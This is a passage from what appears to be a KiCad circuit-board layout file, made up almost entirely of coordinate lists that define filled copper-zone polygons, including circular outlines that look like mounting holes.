127.7872 114.590579) (xy 127.79044 114.586973) (xy 127.819888 114.537461) (xy 127.850121 114.488333) (xy 127.851814 114.483784) (xy 127.85429 114.47962) (xy 127.873552 114.425355) (xy 127.893675 114.371267) (xy 127.894452 114.366474) (xy 127.896072 114.36191) (xy 127.904426 114.304944) (xy 127.913661 114.24797) (xy 127.913492 114.243118) (xy 127.914195 114.238325) (xy 127.911322 114.180765) (xy 127.909317 114.123139) (xy 127.908211 114.11842) (xy 127.907969 114.113574) (xy 127.893967 114.057652) (xy 127.880812 114.00153) (xy 127.877874 113.99309) (xy 127.730302 113.578489) (xy 127.730284 113.578451) (xy 127.730106 113.577941) (xy 127.679935 113.437391) (xy 127.679923 113.437365) (xy 127.679754 113.436883) (xy 127.605565 113.229601) (xy 127.605556 113.229582) (xy 127.605474 113.229348) (xy 127.511907 112.96827) (xy 127.511902 112.968259) (xy 127.511847 112.968103) (xy 127.403542 112.666165) (xy 127.403539 112.666158) (xy 127.403495 112.666033) (xy 127.361287 112.548447) (xy 127.361285 112.548442) (xy 127.285091 112.336172) (xy 127.285087 112.336163) (xy 127.285047 112.33605) (xy 127.161187 111.991204) (xy 127.161182 111.991193) (xy 127.161148 111.991097) (xy 127.079912 111.765051) (xy 127.07991 111.765046) (xy 127.079897 111.76501) (xy 126.675655 110.640413) (xy 126.859665 110.625679) (xy 126.901987 110.618081) (xy 126.944718 110.613076) (xy 126.953436 110.611114) (xy 126.975683 110.605945) (xy 126.982582 110.603612) (xy 126.982606 110.603608) (xy 126.982677 110.60358) (xy 127.023871 110.589652) (xy 127.053533 110.596093) (xy 127.087516 110.600055) (xy 127.121004 110.607008) (xy 127.149396 110.607271) (xy 127.177599 110.610559) (xy 127.211692 110.607847) (xy 127.245904 110.608163) (xy 127.2548 110.60731) (xy 127.283101 110.6044) (xy 127.301214 110.600724) (xy 127.302112 110.600653) (xy 127.303513 110.600258) (xy 127.32366 110.59617) (xy 127.364711 110.59063) (xy 127.384761 110.583771) (xy 127.405512 110.57956) (xy 127.443708 110.563605) (xy 127.482893 110.5502) (xy 127.501225 110.53958) (xy 127.520767 110.531417) (xy 127.555138 110.508347) (xy 127.590972 110.487587) (xy 127.598193 110.482323) (xy 127.619488 110.466574) (xy 127.656621 110.433039) (xy 127.695071 110.40094) (xy 127.702925 110.391222) (xy 127.712187 110.382857) (xy 127.74211 110.342735) (xy 127.773581 110.303792) (xy 127.779393 110.292742) (xy 127.78686 110.28273) (xy 127.808426 110.237546) (xy 127.831728 110.193246) (xy 127.835038 110.184945) (xy 127.850324 110.145827) (xy 127.852357 110.138614) (xy 127.855594 110.131861) (xy 127.869285 110.078568) (xy 127.884216 110.025607) (xy 127.884809 110.018143) (xy 127.886674 110.010884) (xy 127.88798 110.002043) (xy 127.898252 109.929023) (xy 127.899229 109.90577) (xy 127.90305 109.88281) (xy 127.903587 109.87389) (xy 127.909839 109.75644) (xy 127.909546 109.749863) (xy 127.910403 109.74333) (xy 127.910632 109.734397) (xy 127.913859 109.561985) (xy 127.913858 109.561975) (xy 127.913963 109.553225) (xy 127.914934 109.36005) (xy 127.91516 109.315336) (xy 127.915148 109.315203) (xy 127.915168 109.312523) (xy 127.915333 109.06092) (xy 127.91533 109.060892) (xy 127.915333 109.0605) (xy 127.915333 108.150333) (xy 127.909456 108.090395) (xy 127.903997 108.030409) (xy 127.903363 108.028254) (xy 127.903144 108.026023) (xy 127.88575 107.96841) (xy 127.868731 107.910585) (xy 127.86769 107.908593) (xy 127.867042 107.906448) (xy 127.838739 107.853216) (xy 127.810862 107.799893) (xy 127.809459 107.798148) (xy 127.808403 107.796162) (xy 127.770328 107.749479) (xy 127.747877 107.721555) (xy 127.752777 107.709515) (xy 127.775202 107.656937) (xy 127.777829 107.648395) (xy 127.825694 107.488837) (xy 127.837523 107.428537) (xy 127.849577 107.367924) (xy 127.849721 107.366352) (xy 127.849738 107.366267) (xy 127.849738 107.366172) (xy 127.850394 107.359025) (xy 127.869818 107.129985) (xy 127.86957 107.111084) (xy 127.871897 107.09232) (xy 127.872063 107.083385) (xy 127.872956 107.007004) (xy 127.871936 106.995176) (xy 127.872413 106.990635) (xy 127.872223 106.988544) (xy 127.872736 106.981114) (xy 127.872416 106.972183) (xy 127.871845 106.958828) (xy 127.871844 106.958819) (xy 127.861229 106.710632) (xy 127.855417 106.669532) (xy 127.852317 106.628132) (xy 127.850721 106.61934) (xy 127.815293 106.431537) (xy 127.80841 106.407974) (xy 127.80437 106.383758) (xy 127.79094 106.348162) (xy 127.780272 106.311641) (xy 127.768943 106.289864) (xy 127.760277 106.266894) (xy 127.756266 106.258909) (xy 127.693789 106.136671) (xy 127.679757 106.11479) (xy 127.668309 106.091443) (xy 127.646117 106.062334) (xy 127.626362 106.031529) (xy 127.608343 106.012786) (xy 127.592581 105.992111) (xy 127.565161 105.967869) (xy 127.539796 105.941485) (xy 127.518482 105.9266) (xy 127.499003 105.909379) (xy 127.491726 105.904193) (xy 127.399399 105.839353) (xy 127.371468 105.823564) (xy 127.345179 105.805197) (xy 127.317243 105.79291) (xy 127.290664 105.777885) (xy 127.260207 105.767824) (xy 127.230844 105.75491) (xy 127.222332 105.752187) (xy 127.203197 105.746212) (xy 127.180496 105.741494) (xy 127.172061 105.738708) (xy 127.159703 105.737173) (xy 127.154072 105.736003) (xy 127.105363 105.723905) (xy 127.096512 105.72267) (xy 127.000588 105.70996) (xy 126.995544 105.68032) (xy 126.987045 105.658012) (xy 126.9813 105.63484) (xy 126.978255 105.626439) (xy 126.959774 105.576546) (xy 126.937183 105.530072) (xy 126.916159 105.482827) (xy 126.909908 105.473962) (xy 126.905167 105.464209) (xy 126.87398 105.42301) (xy 126.844179 105.380747) (xy 126.836321 105.373261) (xy 126.829779 105.364619) (xy 126.791172 105.330251) (xy 126.753741 105.294592) (xy 126.744589 105.288782) (xy 126.736485 105.281567) (xy 126.691933 105.25535) (xy 126.648293 105.227643) (xy 126.640289 105.223669) (xy 126.604957 105.206428) (xy 126.603483 105.205879) (xy 126.602135 105.205059) (xy 126.54494 105.184095) (xy 126.487893 105.162867) (xy 126.486337 105.162615) (xy 126.484859 105.162073) (xy 126.424633 105.152608) (xy 126.364598 105.142873) (xy 126.363029 105.142927) (xy 126.361467 105.142682) (xy 126.352543 105.142226) (xy 126.308754 105.140291) (xy 126.299074 105.14081) (xy 126.289436 105.139729) (xy 126.2805 105.139667) (xy 126.174667 105.139667) (xy 126.114729 105.145544) (xy 126.054743 105.151003) (xy 126.052588 105.151637) (xy 126.050357 105.151856) (xy 125.992776 105.169241) (xy 125.934919 105.186269) (xy 125.932927 105.18731) (xy 125.930782 105.187958) (xy 125.877585 105.216243) (xy 125.824227 105.244138) (xy 125.822482 105.245541) (xy 125.820496 105.246597) (xy 125.773813 105.284672) (xy 125.726882 105.322404) (xy 125.725437 105.324126) (xy 125.723701 105.325542) (xy 125.685374 105.371871) (xy 125.646594 105.418088) (xy 125.645511 105.420058) (xy 125.644083 105.421784) (xy 125.615484 105.474676) (xy 125.58642 105.527544) (xy 125.58574 105.529687) (xy 125.584675 105.531657) (xy 125.566871 105.589172) (xy 125.548653 105.646604) (xy 125.548403 105.648832) (xy 125.547739 105.650977) (xy 125.541447 105.710844) (xy 125.540422 105.719982) (xy 125.54029 105.719953) (xy 125.504934 105.715735) (xy 125.470051 105.708555) (xy 125.461157 105.707679) (xy 125.387882 105.700972) (xy 125.361572 105.701142) (xy 125.335403 105.698334) (xy 125.326467 105.698315) (xy 125.088728 105.699459) (xy 125.070721 105.701312) (xy 125.052634 105.700652) (xy 125.00872 105.707693) (xy 124.964478 105.712246) (xy 124.947178 105.71756) (xy 124.929304 105.720426) (xy 124.920677 105.722756) (xy 124.750051 105.770104) (xy 124.732987 105.776692) (xy 124.715167 105.780864) (xy 124.67483 105.799144) (xy 124.633527 105.815089) (xy 124.618061 105.82487) (xy 124.601398 105.832421) (xy 124.593023 105.838412) (xy 124.571296 105.825435) (xy 124.529334 105.805644) (xy 124.488398 105.783754) (xy 124.472937 105.779046) (xy 124.458324 105.772154) (xy 124.413317 105.760891) (xy 124.368909 105.747368) (xy 124.360135 105.745673) (xy 124.187666 105.713596) (xy 124.160328 105.711235) (xy 124.133409 105.705891) (xy 124.12451 105.705077) (xy 124.072361 105.700672) (xy 124.058658 105.700857) (xy 124.045089 105.698954) (xy 124.036158 105.698645) (xy 123.812472 105.692468) (xy 123.764392 105.695846) (xy 123.740536 105.696452) (xy 123.73462 105.669194) (xy 123.732688 105.663192) (xy 123.731835 105.656943) (xy 123.713559 105.603775) (xy 123.696342 105.550297) (xy 123.693282 105.544787) (xy 123.691231 105.53882) (xy 123.662978 105.490218) (xy 123.6357 105.4411) (xy 123.631626 105.436286) (xy 123.628456 105.430834) (xy 123.591317 105.388664) (xy 123.555003 105.345761) (xy 123.55007 105.34183) (xy 123.545903 105.337098) (xy 123.501282 105.302947) (xy 123.457324 105.267913) (xy 123.451722 105.265015) (xy 123.446714 105.261182) (xy 123.396288 105.236337) (xy 123.346384 105.210519) (xy 123.340331 105.208766) (xy 123.334671 105.205977) (xy 123.326286 105.202887) (xy 123.257441 105.178062) (xy 123.222132 105.169108) (xy 123.187677 105.157305) (xy 123.161741 105.153794) (xy 123.136367 105.147359) (xy 123.099995 105.145434) (xy 123.0639 105.140547) (xy 123.054968 105.14028) (xy 123.035464 105.139834) (xy 123.026765 105.140487) (xy 123.018095 105.139674) (xy 122.964589 105.145151) (xy 122.910908 105.149178) (xy 122.90251 105.151505) (xy 122.893839 105.152393) (xy 122.885093 105.154227) (xy 122.804533 105.171711) (xy 122.798524 105.173646) (xy 122.792277 105.174498) (xy 122.739144 105.192762) (xy 122.685637 105.209988) (xy 122.680123 105.21305) (xy 122.674154 105.215102) (xy 122.625551 105.243356) (xy 122.576439 105.27063) (xy 122.571625 105.274705) (xy 122.566168 105.277877) (xy 122.523992 105.315021) (xy 122.481099 105.351326) (xy 122.477166 105.356261) (xy 122.472432 105.36043) (xy 122.438285 105.405045) (xy 122.40325 105.449004) (xy 122.40035 105.45461) (xy 122.396516 105.459619) (xy 122.371668 105.51005) (xy 122.345856 105.559943) (xy 122.344102 105.565997) (xy 122.341311 105.571662) (xy 122.338221 105.580047) (xy 122.313396 105.648892) (xy 122.304447 105.684181) (xy 122.297561 105.704279) (xy 122.271727 105.699192) (xy 122.245005 105.69922) (xy 122.218435 105.696259) (xy 122.209499 105.696203) (xy 122.080808 105.696294) (xy 122.061381 105.698213) (xy 122.041868 105.697507) (xy 122.032952 105.69812) (xy 121.991802 105.701235) (xy 121.965683 105.705807) (xy 121.939205 105.707413) (xy 121.93039 105.708884) (xy 121.797007 105.732095) (xy 121.79559 105.731533) (xy 121.786984 105.729126) (xy 121.725857 105.712482) (xy 121.679275 105.704577) (xy 121.633133 105.69446) (xy 121.61782 105.694148) (xy 121.602712 105.691584) (xy 121.55549 105.692877) (xy 121.508253 105.691914) (xy 121.499349 105.692667) (xy 121.468731 105.695471) (xy 121.428647 105.703141) (xy 121.388128 105.708074) (xy 121.367434 105.714854) (xy 121.346051 105.718946) (xy 121.30822 105.734256) (xy 121.269431 105.746965) (xy 121.250448 105.757636) (xy 121.243681 105.760374) (xy 121.223924 105.752889) (xy 121.201404 105.741209) (xy 121.165647 105.730812) (xy 121.130833 105.717623) (xy 121.122192 105.715349) (xy 121.101139 105.709963) (xy 121.085859 105.707612) (xy 121.081465 105.706334) (xy 121.072372 105.705536) (xy 121.05093 105.702237) (xy 121.001007 105.692676) (xy 120.989275 105.692749) (xy 120.977686 105.690966) (xy 120.926929 105.693139) (xy 120.876103 105.693457) (xy 120.864611 105.695807) (xy 120.852895 105.696309) (xy 120.8035 105.708306) (xy 120.75373 105.718485) (xy 120.742921 105.723019) (xy 120.731517 105.725789) (xy 120.708322 105.736532) (xy 120.657046 105.724359) (xy 120.624645 105.719947) (xy 120.592786 105.712531) (xy 120.583919 105.711427) (xy 120.51561 105.703399) (xy 120.497073 105.703042) (xy 120.478748 105.700143) (xy 120.469824 105.699678) (xy 120.328958 105.693307) (xy 120.324984 105.693516) (xy 120.321039 105.692998) (xy 120.262619 105.696796) (xy 120.204224 105.699867) (xy 120.200371 105.700843) (xy 120.196397 105.701101) (xy 120.187589 105.70261) (xy 120.097402 105.718707) (xy 120.038208 105.735368) (xy 119.978726 105.751943) (xy 119.977975 105.752322) (xy 119.977168 105.752549) (xy 119.922429 105.780343) (xy 119.867207 105.808201) (xy 119.865873 105.80906) (xy 119.865796 105.809099) (xy 119.865722 105.809157) (xy 119.859694 105.813038) (xy 119.787316 105.860347) (xy 119.7642 105.878913) (xy 119.750881 105.869405) (xy 119.707683 105.844543) (xy 119.665519 105.818) (xy 119.653649 105.813445) (xy 119.642624 105.8071) (xy 119.595433 105.791107) (xy 119.548904 105.773253) (xy 119.540272 105.770942) (xy 119.359661 105.723923) (xy 119.2993 105.714372) (xy 119.238725 105.704549) (xy 119.236403 105.704419) (xy 119.23629 105.704401) (xy 119.236168 105.704406) (xy 119.229803 105.704049) (xy 119.027427 105.694114) (xy 118.970116 105.696907) (xy 118.912705 105.698793) (xy 118.903853 105.700019) (xy 118.717962 105.727079) (xy 118.71541 105.72771) (xy 118.712788 105.727854) (xy 118.654761 105.742699) (xy 118.596705 105.757048) (xy 118.59433 105.75816) (xy 118.59178 105.758812) (xy 118.583402 105.76192) (xy 118.500526 105.79332) (xy 118.482497 105.80225) (xy 118.463448 105.808715) (xy 118.426649 105.829914) (xy 118.388598 105.848762) (xy 118.372652 105.86102) (xy 118.370204 105.86243) (xy 118.368544 105.861548) (xy 118.220988 105.784417) (xy 118.181516 105.768471) (xy 118.143121 105.750098) (xy 118.123736 105.74513) (xy 118.105175 105.737632) (xy 118.063367 105.729659) (xy 118.022125 105.71909) (xy 118.013284 105.717789) (xy 117.940798 105.707636) (xy 117.939681 105.700471) (xy 117.93809 105.696114) (xy 117.937309 105.691536) (xy 117.934893 105.682932) (xy 117.918777 105.627043) (xy 117.908402 105.600952) (xy 117.900893 105.57389) (xy 117.885376 105.543048) (xy 117.872623 105.510977) (xy 117.857379 105.487401) (xy 117.844756 105.46231) (xy 117.823544 105.43507) (xy 117.804804 105.406086) (xy 117.785266 105.385914) (xy 117.768014 105.363759) (xy 117.741925 105.341166) (xy 117.717904 105.316365) (xy 117.694818 105.300371) (xy 117.673593 105.28199) (xy 117.666263 105.276878) (xy 117.635264 105.255579) (xy 117.598808 105.235461) (xy 117.563725 105.212995) (xy 117.544231 105.205342) (xy 117.525905 105.195229) (xy 117.486227 105.182572) (xy 117.447457 105.167352) (xy 117.426856 105.163633) (xy 117.406907 105.157269) (xy 117.365521 105.152559) (xy 117.324539 105.14516) (xy 117.315627 105.1445) (xy 117.264876 105.141099) (xy 117.247899 105.141623) (xy 117.231019 105.139729) (xy 117.222083 105.139667) (xy 117.115333 105.139667) (xy 117.055395 105.145544) (xy 116.995409 105.151003) (xy 116.993254 105.151637) (xy 116.991023 105.151856) (xy 116.933442 105.169241) (xy 116.875585 105.186269) (xy 116.873593 105.18731) (xy 116.871448 105.187958) (xy 116.818251 105.216243) (xy 116.764893 105.244138) (xy 116.763148 105.245541) (xy 116.761162 105.246597) (xy 116.714479 105.284672) (xy 116.667548 105.322404) (xy 116.666103 105.324126) (xy 116.664367 105.325542) (xy 116.62604 105.371871) (xy 116.58726 105.418088) (xy 116.586177 105.420058) (xy 116.584749 105.421784) (xy 116.55615 105.474676) (xy 116.527086 105.527544) (xy 116.526406 105.529687) (xy 116.525341 105.531657) (xy 116.507537 105.589172) (xy 116.489319 105.646604) (xy 116.489069 105.648832) (xy 116.488405 105.650977) (xy 116.482113 105.710844) (xy 116.475395 105.770731) (xy 116.475365 105.775046) (xy 116.475349 105.775199) (xy 116.475363 105.775352) (xy 116.475333 105.779667) (xy 116.475333 105.820647) (xy 116.443374 105.817062) (xy 116.434438 105.817) (xy 115.92469 105.817) (xy 115.923818 105.817086) (xy 115.922952 105.817003) (xy 115.861638 105.823182) (xy 115.80038 105.829189) (xy 115.799548 105.82944) (xy 115.798676 105.829528) (xy 115.739552 105.847554) (xy 115.680805 105.865291) (xy 115.680036 105.8657) (xy 115.679199 105.865955) (xy 115.624963 105.894982) (xy 115.570519 105.92393) (xy 115.569839 105.924485) (xy 115.569074 105.924894) (xy 115.521522 105.963892) (xy 115.473724 106.002875) (xy 115.473169 106.003546) (xy 115.472492 106.004101) (xy 115.433341 106.05169) (xy 115.394106 106.099117) (xy 115.393691 106.099884) (xy 115.393136 106.100559) (xy 115.364059 106.154687) (xy 115.334698 106.20899) (xy 115.334441 106.209821) (xy 115.334026 106.210593) (xy 115.316023 106.269318) (xy 115.297762 106.32831) (xy 115.29767 106.329181) (xy 115.297415 106.330014) (xy 115.291125 106.391454) (xy 115.284706 106.452532) (xy 115.284785 106.453395) (xy 115.284695 106.45427) (xy 115.28472 106.463206) (xy 115.288074 106.809118) (xy 115.272756 106.800892) (xy 115.241989 106.781006) (xy 115.217875 106.771421) (xy 115.194997 106.759136) (xy 115.186725 106.755755) (xy 115.040654 106.697228) (xy 114.981004 106.679859) (xy 114.921789 106.662508) (xy 114.920788 106.662325) (xy 114.920728 106.662308) (xy 114.920659 106.662302) (xy 114.912998 106.660905) (xy 114.717065 106.626599) (xy 114.684148 106.624106) (xy 114.651595 106.618586) (xy 114.642676 106.618022) (xy 114.383284 106.603412) (xy 114.372536 106.603858) (xy 114.361848 106.602564) (xy 114.352913 106.602424) (xy 114.199952 106.601081) (xy 114.193738 106.601635) (xy 114.187515 106.601092) (xy 114.17858 106.60125) (xy 113.885906 106.608456) (xy 113.865318 106.610988) (xy 113.844567 106.610813) (xy 113.835673 106.611673) (xy 113.613495 106.634703) (xy 113.570961 106.643371) (xy 113.527975 106.649483) (xy 113.519308 106.651659) (xy 113.354316 106.694309) (xy 113.343179 106.698383) (xy 113.331539 106.700648) (xy 113.284609 106.719809) (xy 113.237012 106.737221) (xy 113.226882 106.743378) (xy 113.215901 106.747862) (xy 113.208026 106.752087) (xy 113.086907 106.818151) (xy 113.062694 106.834613) (xy 113.036903 106.848469) (xy 113.01117 106.869641) (xy 112.983612 106.888377) (xy 112.963061 106.909224) (xy 112.940449 106.927829) (xy 112.93418 106.934197) (xy 112.925931 106.942693) (xy 112.884643 106.909833) (xy 112.837361 106.871811) (xy 112.835928 106.871062) (xy 112.834653 106.870047) (xy 112.827118 106.865244) (xy 112.688851 106.778459) (xy 112.662016 106.765071) (xy 112.63668 106.749023) (xy 112.606262 106.737255) (xy 112.577083 106.722697) (xy 112.548166 106.714778) (xy 112.520189 106.703954) (xy 112.511563 106.701619) (xy 112.313793 106.649549) (xy 112.2651 106.641706) (xy 112.216763 106.631861) (xy 112.207868 106.631003) (xy 111.941762 106.607198) (xy 111.922816 106.607359) (xy 111.904014 106.604942) (xy 111.89508 106.604736) (xy 111.685843 106.601354) (xy 111.680554 106.601786) (xy 111.675268 106.60127) (xy 111.666332 106.601336) (xy 111.455888 106.604351) (xy 111.452513 106.604731) (xy 111.449118 106.604483) (xy 111.440187 106.604768) (xy 111.250872 106.61213) (xy 111.244747 106.612972) (xy 111.238569 106.612727) (xy 111.229652 106.613309) (xy 111.083214 106.623882) (xy 111.063853 106.627202) (xy 111.044218 106.627901) (xy 111.03537 106.629151) (xy 110.95715 106.640757) (xy 110.950223 106.642489) (xy 110.943106 106.643001) (xy 110.889686 106.657628) (xy 110.835976 106.671059) (xy 110.829524 106.6741) (xy 110.822634 106.675987) (xy 110.814309 106.679235) (xy 110.741266 106.708322) (xy 110.735308 106.711399) (xy 110.7289 106.713396) (xy 110.679838 106.740045) (xy 110.630285 106.765636) (xy 110.625039 106.769811) (xy 110.61914 106.773015) (xy 110.576201 106.808676) (xy 110.53255 106.843414) (xy 110.528211 106.848532) (xy 110.523051 106.852818) (xy 110.48787 106.896123) (xy 110.451783 106.938694) (xy 110.451171 106.939793) (xy 110.412541 106.904916) (xy 110.383247 106.883258) (xy 110.355821 106.859285) (xy 110.333149 106.846218) (xy 110.312105 106.830659) (xy 110.279169 106.815106) (xy 110.247603 106.796913) (xy 110.239437 106.793285) (xy 110.006729 106.691827) (xy 109.995901 106.688318) (xy 109.98577 106.683128) (xy 109.93657 106.669089) (xy 109.887907 106.653318) (xy 109.876607 106.651979) (xy 109.865658 106.648855) (xy 109.856856 106.647316) (xy 109.562965 106.598003) (xy 109.511905 106.5945) (xy 109.460978 106.589191) (xy 109.452042 106.589199) (xy 109.117903 106.591818) (xy 109.084181 106.595392) (xy 109.050268 106.595935) (xy 109.041397 106.597011) (xy 108.776867 106.630983) (xy 108.725271 106.642817) (xy 108.673373 106.653096) (xy 108.664837 106.655739) (xy 108.464715 106.719234) (xy 108.434329 106.73226) (xy 108.402869 106.742433) (xy 108.377058 106.756811) (xy 108.349913 106.768447) (xy 108.34036 106.774989) (xy 108.336796 106.77204) (xy 108.290579 106.73326) (xy 108.288609 106.732177) (xy 108.286883 106.730749) (xy 108.233991 106.70215) (xy 108.181123 106.673086) (xy 108.17898 106.672406) (xy 108.17701 106.671341) (xy 108.119495 106.653537) (xy 108.062063 106.635319) (xy 108.060855 106.635183) (xy 108.056607 106.598017) (xy 108.047318 106.554763) (xy 108.040516 106.511047) (xy 108.038226 106.502409) (xy 107.98752 106.316356) (xy 107.974787 106.282915) (xy 107.964895 106.248531) (xy 107.952616 106.224689) (xy 107.943073 106.199626) (xy 107.924091 106.169301) (xy 107.907706 106.137486) (xy 107.902807 106.130013) (xy 107.818529 106.003401) (xy 107.812419 105.995922) (xy 107.80762 105.987534) (xy 107.772949 105.947613) (xy 107.739501 105.906673) (xy 107.732049 105.900519) (xy 107.725717 105.893228) (xy 107.683956 105.860803) (xy 107.643191 105.827138) (xy 107.634693 105.822553) (xy 107.627059 105.816625) (xy 107.619466 105.811913) (xy 107.489273 105.732358) (xy 107.458925 105.717669) (xy 107.430028 105.700311) (xy 107.40285 105.690529) (xy 107.376843 105.677942) (xy 107.344222 105.669429) (xy 107.312502 105.658012) (xy 107.303824 105.655881) (xy 107.115373 105.611006) (xy 107.074516 105.605414) (xy 107.034116 105.597114) (xy 107.025223 105.596241) (xy 106.794518 105.575209) (xy 106.788099 105.575253) (xy 106.781764 105.574174) (xy 106.772846 105.573604) (xy 106.399099 105.552294) (xy 106.383079 105.552948) (xy 106.367135 105.551272) (xy 106.320787 105.55549) (xy 106.274297 105.557387) (xy 106.258714 105.561139) (xy 106.242743 105.562592) (xy 106.198093 105.575733) (xy 106.15286 105.586623) (xy 106.138299 105.593331) (xy 106.122919 105.597858) (xy 106.08169 105.619412) (xy 106.039415 105.638889) (xy 106.026428 105.648303) (xy 106.012227 105.655727) (xy 105.975968 105.68488) (xy 105.938283 105.712196) (xy 105.927379 105.723945) (xy 105.914882 105.733993) (xy 105.88496 105.769653) (xy 105.853316 105.80375) (xy 105.844904 105.81739) (xy 105.834594 105.829677) (xy 105.812166 105.870473) (xy 105.78775 105.910063) (xy 105.782147 105.925077) (xy 105.77442 105.939133) (xy 105.760349 105.983491) (xy 105.744081 106.027087) (xy 105.7415 106.042914) (xy 105.736653 106.058193) (xy 105.731466 106.104436) (xy 105.723975 106.150364) (xy 105.724517 106.166384) (xy 105.722729 106.18232) (xy 105.722667 106.191256) (xy 25.03167 106.191256) (xy 24.085098 104.551459) (xy 24.053377 104.490702) (xy 21.762242 99.608899) (xy 21.645142 99.340439) (xy 21.546488 99.075435) (xy 21.46263 98.805825) (xy 21.393707 98.532232) (xy 21.339858 98.255281) (xy 21.301219 97.975583) (xy 21.277932 97.693768) (xy 21.269875 97.401) (xy 21.269864 96.750457) (xy 34.678144 96.750457) (xy 34.678144 97.269507) (xy 34.779405 97.778583) (xy 34.978037 98.258123) (xy 35.266406 98.689697) (xy 35.633429 99.05672) (xy 36.065003 99.345089) (xy 36.544543 99.543721) (xy 37.053619 99.644982) (xy 37.572669 99.644982) (xy 38.081745 99.543721) (xy 38.561285 99.345089) (xy 38.992859 99.05672) (xy 39.359882 98.689697) (xy 39.648251 98.258123) (xy 39.846883 97.778583) (xy 39.948144 97.269507) (xy 39.948144 96.750457) (xy 39.846883 96.241381) (xy 39.648251 95.761841) (xy 39.359882 95.330267) (xy 38.992859 94.963244) (xy 38.561285 94.674875) (xy 38.081745 94.476243) (xy 37.572669 94.374982) (xy 37.053619 94.374982) (xy 36.544543 94.476243) (xy 36.065003 94.674875) (xy 35.633429 94.963244) (xy 35.266406 95.330267) (xy 34.978037 95.761841) (xy 34.779405 96.241381) (xy 34.678144 96.750457) (xy 21.269864 96.750457) (xy 21.26955 79.549575) (xy 59.278046 79.549575) (xy 59.278046 80.068625) (xy 59.379307 80.577701) (xy 59.577939 81.057241) (xy 59.866308 81.488815) (xy 60.233331 81.855838) (xy 60.664905 82.144207) (xy 61.144445 82.342839) (xy 61.653521 82.4441) (xy 62.172571 82.4441) (xy 62.681647 82.342839) (xy 63.161187 82.144207) (xy 63.452026 81.949874) (xy 135.47805 81.949874) (xy 135.47805 82.468924) (xy 135.579311 82.978) (xy 135.777943 83.45754) (xy 136.066312 83.889114) (xy 136.433335 84.256137) (xy 136.864909 84.544506) (xy 137.344449 84.743138) (xy 137.853525 84.844399) (xy 138.372575 84.844399) (xy 138.881651 84.743138) (xy 139.361191 84.544506) (xy 139.792765 84.256137) (xy 140.159788 83.889114) (xy 140.448157 83.45754) (xy 140.646789 82.978) (xy 140.74805 82.468924) (xy 140.74805 81.949874) (xy 140.646789 81.440798) (xy 140.448157 80.961258) (xy 140.159788 80.529684) (xy 139.792765 80.162661) (xy 139.361191 79.874292) (xy 138.881651 79.67566) (xy 138.372575 79.574399) (xy 137.853525 79.574399) (xy 137.344449 79.67566) (xy 136.864909 79.874292) (xy 136.433335 80.162661) (xy 136.066312 80.529684) (xy 135.777943 80.961258) (xy 135.579311 81.440798) (xy 135.47805 81.949874) (xy 63.452026 81.949874) (xy 63.592761 81.855838) (xy 63.959784 81.488815) (xy 64.248153 81.057241) (xy 64.446785 80.577701) (xy 64.548046 80.068625) (xy 64.548046 79.549575) (xy 64.446785 79.040499) (xy 64.248153 78.560959) (xy 63.959784 78.129385) (xy 63.592761 77.762362) (xy 63.161187 77.473993) (xy 62.681647 77.275361) (xy 62.172571 77.1741) (xy 61.653521 77.1741) (xy 61.144445 77.275361) (xy 60.664905 77.473993) (xy 60.233331 77.762362) (xy 59.866308 78.129385) (xy 59.577939 78.560959) (xy 59.379307 79.040499) (xy 59.278046 79.549575) (xy 21.26955 79.549575) (xy 21.268857 41.549903) (xy 59.278046 41.549903) (xy 59.278046 42.068953) (xy 59.379307 42.578029) (xy 59.577939 43.057569) (xy 59.866308 43.489143) (xy 60.233331 43.856166) (xy 60.664905 44.144535) (xy 61.144445 44.343167) (xy 61.653521 44.444428) (xy 62.172571 44.444428) (xy 62.681647 44.343167) (xy 63.161187 44.144535) (xy 63.592761 43.856166) (xy 63.699385 43.749542) (xy 135.47805 43.749542) (xy 135.47805 44.268592) (xy 135.579311 44.777668) (xy 135.777943 45.257208) (xy 136.066312 45.688782) (xy 136.433335 46.055805) (xy 136.864909 46.344174) (xy 137.344449 46.542806) (xy 137.853525 46.644067) (xy 138.372575 46.644067) (xy 138.881651 46.542806) (xy 139.361191 46.344174) (xy 139.792765 46.055805) (xy 140.159788 45.688782) (xy 140.448157 45.257208) (xy 140.646789 44.777668) (xy 140.74805 44.268592) (xy 140.74805 43.749542) (xy 140.646789 43.240466) (xy 140.448157 42.760926) (xy 140.159788 42.329352) (xy 139.792765 41.962329) (xy 139.361191 41.67396) (xy 138.881651 41.475328) (xy 138.372575 41.374067) (xy 137.853525 41.374067) (xy 137.344449 41.475328) (xy 136.864909 41.67396) (xy 136.433335 41.962329) (xy 136.066312 42.329352) (xy 135.777943 42.760926) (xy 135.579311 43.240466) (xy 135.47805 43.749542) (xy 63.699385 43.749542) (xy 63.959784 43.489143) (xy 64.248153 43.057569) (xy 64.446785 42.578029) (xy 64.548046 42.068953) (xy 64.548046 41.549903) (xy 64.446785 41.040827) (xy 64.248153 40.561287) (xy 63.959784 40.129713) (xy 63.592761 39.76269) (xy 63.161187 39.474321) (xy 62.681647 39.275689) (xy 62.172571 39.174428) (xy 61.653521 39.174428) (xy 61.144445 39.275689) (xy 60.664905 39.474321) (xy 60.233331 39.76269) (xy 59.866308 40.129713) (xy 59.577939 40.561287) (xy 59.379307 41.040827) (xy 59.278046 41.549903) (xy 21.268857 41.549903) (xy 21.268476 20.739885) (xy 21.281514 20.610545) (xy 21.308218 20.524518) (xy 21.350695 20.446257) (xy 21.407479 20.377433) (xy 21.476301 20.320649) (xy 21.554557 20.278172) (xy 21.640571 20.251472) (xy 21.769924 20.238433) ) ) (filled_polygon (pts (xy 111.457934 112.815029) (xy 111.457933 112.821182) (xy 111.452021 113.091919) (xy 111.45195 113.092556) (xy 111.34695 113.092121) (xy 111.256613 113.087758) (xy 110.84288 113.06496) (xy 110.827467 113.065618) (xy 110.812135 113.064007) (xy 110.770333 113.067811) (xy 110.770333 112.619374) (xy 110.803199 112.622828) (xy 110.811905 112.622036) (xy 110.820626 112.622713) (xy 110.829559 112.622469) (xy 111.284301 112.606905) (xy 111.455323 112.603393) ) ) (filled_polygon (pts (xy 120.515603 108.112895) (xy 120.542182 108.133706) (xy 120.567934 108.146748) (xy 120.592152 108.162416) (xy 120.623505 108.174894) (xy 120.653612 108.190142) (xy 120.681389 108.19793) (xy 120.708205 108.208602) (xy 120.741387 108.214752) (xy 120.77388 108.223862) (xy 120.78269 108.225361) (xy 120.821288 108.231655) (xy 120.848268 108.233381) (xy 120.872749 108.237836) (xy 120.89312 108.237521) (xy 120.914127 108.239918) (xy 120.923063 108.239997) (xy 120.924107 108.239999) 